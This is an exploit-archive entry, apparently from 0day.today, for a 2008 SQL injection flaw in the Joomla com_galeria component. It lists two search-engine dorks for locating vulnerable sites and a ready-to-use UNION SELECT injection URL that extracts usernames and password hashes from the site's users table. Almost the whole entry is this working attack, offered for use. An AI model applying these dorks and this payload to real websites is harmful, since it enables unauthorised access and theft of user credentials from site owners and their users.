id: 2653
date: 02/16/2008
title: Joomla Component com_galeria Remote SQL Injection Vulnerability
author: S@BUN
cves: 

===============================================================
Joomla Component com_galeria Remote SQL Injection Vulnerability
===============================================================



###############################################################
#
# joomla SQL Injection(com_galeria)
#
################################################################
#
# DORK 1 : allinurl: "com_galeria"
#
# DORK 2 : allinurl: id "com_galeria"
#
################################################################
EXPLOIT :

index.php?option=com_galeria&Itemid=S@BUN&func=detail&id=-999999/**/union/**/select/**/0,0,password,111,222,333,0,0,0,0,0,1,1,1,1,1,1,444,555,666,username/**/from/**/users/*




#  0day.today [2023-03-26]  #